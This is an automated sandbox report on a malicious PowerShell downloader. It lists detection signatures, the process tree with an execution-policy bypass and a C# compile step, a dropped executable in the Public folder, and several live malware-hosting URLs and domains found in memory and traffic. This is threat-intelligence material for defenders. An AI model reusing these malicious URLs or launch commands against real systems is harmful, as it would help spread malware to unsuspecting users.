Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ps1001.ps1

Overview

General Information

Sample name:ps1001.ps1
Analysis ID:1560751
MD5:5996b2aa1d6b234a48ed62f1ecaae159
SHA1:4f6e56e34d7da66cb1f9b9ebc707f7fd01764352
SHA256:100a4c16630356774d7ebee6681d40279fcb4ceabccf194d371af739ca98ce53
Tags:malwareps1user-Joker
Infos:

Detection

Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
AI detected suspicious sample
Loading BitLocker PowerShell Module
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 4640 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ps1001.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 4584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • csc.exe (PID: 4508 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dakef3hk\dakef3hk.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • cvtres.exe (PID: 2072 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4568.tmp" "c:\Users\user\AppData\Local\Temp\dakef3hk\CSC7EF384CB672F47F5B690A91D9C6EAB3.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 4640JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    Process Memory Space: powershell.exe PID: 4640INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
    • 0x37f3ef:$b2: ::FromBase64String(
    • 0x37f46f:$b2: ::FromBase64String(
    • 0x37f9e0:$b2: ::FromBase64String(
    • 0x44380e:$b2: ::FromBase64String(
    • 0x44388e:$b2: ::FromBase64String(
    • 0x443dff:$b2: ::FromBase64String(
    • 0x136d55a:$b2: ::FromBase64String(
    • 0x136d5da:$b2: ::FromBase64String(
    • 0x136db4b:$b2: ::FromBase64String(
    • 0x37f918:$s1: -join
    • 0x443d37:$s1: -join
    • 0x51d64a:$s1: -join
    • 0x5224e5:$s1: -join
    • 0x52a6e7:$s1: -join
    • 0x5400ac:$s1: -join
    • 0x8d9544:$s1: -join
    • 0x8da7e9:$s1: -join
    • 0x8db10a:$s1: -join
    • 0x8dbb24:$s1: -join
    • 0x8dc471:$s1: -join
    • 0x8dc4a3:$s1: -join

    Sigma Signatures

    System Summary

    barindex
    Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
    Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4640, TargetFilename: C:\Users\Public\509.exe
    Sigma detected: Change PowerShell Policies to an Insecure Level
    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ps1001.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ps1001.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ps1001.ps1", ProcessId: 4640, ProcessName: powershell.exe
    Sigma detected: Dynamic .NET Compilation Via Csc.EXE
    Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dakef3hk\dakef3hk.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dakef3hk\dakef3hk.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ps1001.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4640, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dakef3hk\dakef3hk.cmdline", ProcessId: 4508, ProcessName: csc.exe
    Sigma detected: Potential Binary Or Script Dropper Via PowerShell
    Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4640, TargetFilename: C:\Users\Public\509.exe
    Sigma detected: Dynamic CSharp Compile Artefact
    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4640, TargetFilename: C:\Users\user\AppData\Local\Temp\dakef3hk\dakef3hk.cmdline
    Sigma detected: Non Interactive PowerShell Process Spawned
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ps1001.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ps1001.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ps1001.ps1", ProcessId: 4640, ProcessName: powershell.exe

    Data Obfuscation

    barindex
    Sigma detected: Dot net compiler compiles file from suspicious location
    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dakef3hk\dakef3hk.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dakef3hk\dakef3hk.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ps1001.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4640, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dakef3hk\dakef3hk.cmdline", ProcessId: 4508, ProcessName: csc.exe

    Suricata Signatures

    No Suricata rule has matched

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Antivirus / Scanner detection for submitted sample
    Source: ps1001.ps1Avira: detected
    Antivirus detection for URL or domain
    Source: http://fenett2018.comAvira URL Cloud: Label: malware
    Source: http://eastend.jp/bl5kfaAvira URL Cloud: Label: malware
    Source: http://yourmother4cancer.infoAvira URL Cloud: Label: malware
    Source: http://yourmother4cancer.info/Nereidae/ZdDZ/umping?HGn3Nw=1932-05-23Avira URL Cloud: Label: malware
    Source: http://eastend.jpAvira URL Cloud: Label: malware
    Source: http://bemnyc.com/u8erijeqAvira URL Cloud: Label: malware
    Source: http://fenett2018.com/dobgxAvira URL Cloud: Label: malware
    Source: http://abakus-biuro.net//a9zqemmAvira URL Cloud: Label: malware
    Multi AV Scanner detection for submitted file
    Source: ps1001.ps1ReversingLabs: Detection: 63%
    AI detected suspicious sample
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
    Source: global trafficHTTP traffic detected: GET /bl5kfa HTTP/1.1Host: eastend.jpConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /u8erijeq HTTP/1.1Host: bemnyc.comConnection: Keep-Alive
    Source: Joe Sandbox ViewIP Address: 198.185.159.145 198.185.159.145
    Source: Joe Sandbox ViewIP Address: 198.185.159.145 198.185.159.145
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /bl5kfa HTTP/1.1Host: eastend.jpConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /u8erijeq HTTP/1.1Host: bemnyc.comConnection: Keep-Alive
    Source: global trafficDNS traffic detected: DNS query: habarimoto24.com
    Source: global trafficDNS traffic detected: DNS query: fenett2018.com
    Source: global trafficDNS traffic detected: DNS query: eastend.jp
    Source: global trafficDNS traffic detected: DNS query: bemnyc.com
    Source: global trafficDNS traffic detected: DNS query: abakus-biuro.net
    Source: global trafficDNS traffic detected: DNS query: yourmother4cancer.info
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 22 Nov 2024 08:27:52 GMTContent-Type: text/htmlContent-Length: 2814Connection: keep-aliveVary: Accept-EncodingLast-Modified: Tue, 25 Jul 2023 10:28:06 GMTETag: "afe-6014d2fcf5ab8"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 69 6d 67 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 75 6c 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 0a 7d 0a 68 74 6d 6c 20 7b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 62 37 39 62 37 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 a5 e1 a5 a4 a5 ea a5 aa 22 2c 20 4d 65 69 72 79 6f 2c 20 22 a3 cd a3 d3 20 a3 d0 a5 b4 a5 b7 a5 c3 a5 af 22 2c 20 22 4d 53 20 50 47 6f 74 68 69 63 22 2c 20 22 a5 d2 a5 e9 a5 ae a5 ce b3 d1 a5 b4 20 50 72 6f 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 68 32 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a
    Source: powershell.exe, 00000001.00000002.2351696748.00000250003FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://abakus-biuro.net
    Source: powershell.exe, 00000001.00000002.2351696748.0000025000227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2351696748.00000250003FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2374538901.0000025010072000.00000004.00000800.00020000.00000000.sdmp, ps1001.ps1String found in binary or memory: http://abakus-biuro.net//a9zqemm
    Source: powershell.exe, 00000001.00000002.2351696748.00000250003FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bemnyc.com
    Source: powershell.exe, 00000001.00000002.2351696748.0000025000227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2374538901.0000025010072000.00000004.00000800.00020000.00000000.sdmp, ps1001.ps1String found in binary or memory: http://bemnyc.com/u8erijeq
    Source: powershell.exe, 00000001.00000002.2351696748.00000250003FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://eastend.jp
    Source: powershell.exe, 00000001.00000002.2351696748.0000025000227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2374538901.0000025010072000.00000004.00000800.00020000.00000000.sdmp, ps1001.ps1String found in binary or memory: http://eastend.jp/bl5kfa
    Source: powershell.exe, 00000001.00000002.2351696748.00000250003ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fenett2018.com
    Source: powershell.exe, 00000001.00000002.2351696748.0000025000227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2374538901.0000025010072000.00000004.00000800.00020000.00000000.sdmp, ps1001.ps1String found in binary or memory: http://fenett2018.com/dobgx
    Source: powershell.exe, 00000001.00000002.2351696748.0000025000227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://habarimoto24.com
    Source: powershell.exe, 00000001.00000002.2351696748.0000025000227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2374538901.0000025010072000.00000004.00000800.00020000.00000000.sdmp, ps1001.ps1String found in binary or memory: http://habarimoto24.com/nh
    Source: powershell.exe, 00000001.00000002.2374538901.0000025010DE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2374538901.00000250109CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000001.00000002.2351696748.0000025000227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000001.00000002.2351696748.00000250003FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
    Source: powershell.exe, 00000001.00000002.2351696748.0000025000001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000001.00000002.2351696748.00000250003FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
    Source: powershell.exe, 00000001.00000002.2351696748.0000025000227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: powershell.exe, 00000001.00000002.2351696748.00000250003FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://yourmother4cancer.info
    Source: powershell.exe, 00000001.00000002.2351696748.0000025000227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://yourmother4cancer.info/Nereidae/ZdDZ/umping?HGn3Nw=1932-05-23
    Source: powershell.exe, 00000001.00000002.2351696748.0000025000001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
    Source: powershell.exe, 00000001.00000002.2351696748.00000250003FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2351696748.0000025001842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
    Source: powershell.exe, 00000001.00000002.2351696748.000002500181C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2351696748.0000025001842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
    Source: powershell.exe, 00000001.00000002.2374538901.00000250109CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000001.00000002.2374538901.00000250109CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000001.00000002.2374538901.00000250109CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
    Source: powershell.exe, 00000001.00000002.2351696748.0000025000227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 00000001.00000002.2351696748.0000025001BBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
    Source: powershell.exe, 00000001.00000002.2374538901.00000250109CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
    Source: powershell.exe, 00000001.00000002.2351696748.00000250003FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://status.squarespace.com

    System Summary

    barindex
    Malicious sample detected (through community Yara rule)
    Source: Process Memory Space: powershell.exe PID: 4640, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFB4B2B5F781_2_00007FFB4B2B5F78
    Source: Process Memory Space: powershell.exe PID: 4640, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
    Source: classification engineClassification label: mal96.expl.evad.winPS1@7/14@6/2
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\509.exeJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4584:120:WilError_03
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lijprhbp.wc4.ps1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
    Source: ps1001.ps1ReversingLabs: Detection: 63%
    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ps1001.ps1"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dakef3hk\dakef3hk.cmdline"
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4568.tmp" "c:\Users\user\AppData\Local\Temp\dakef3hk\CSC7EF384CB672F47F5B690A91D9C6EAB3.TMP"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dakef3hk\dakef3hk.cmdline"Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4568.tmp" "c:\Users\user\AppData\Local\Temp\dakef3hk\CSC7EF384CB672F47F5B690A91D9C6EAB3.TMP"Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
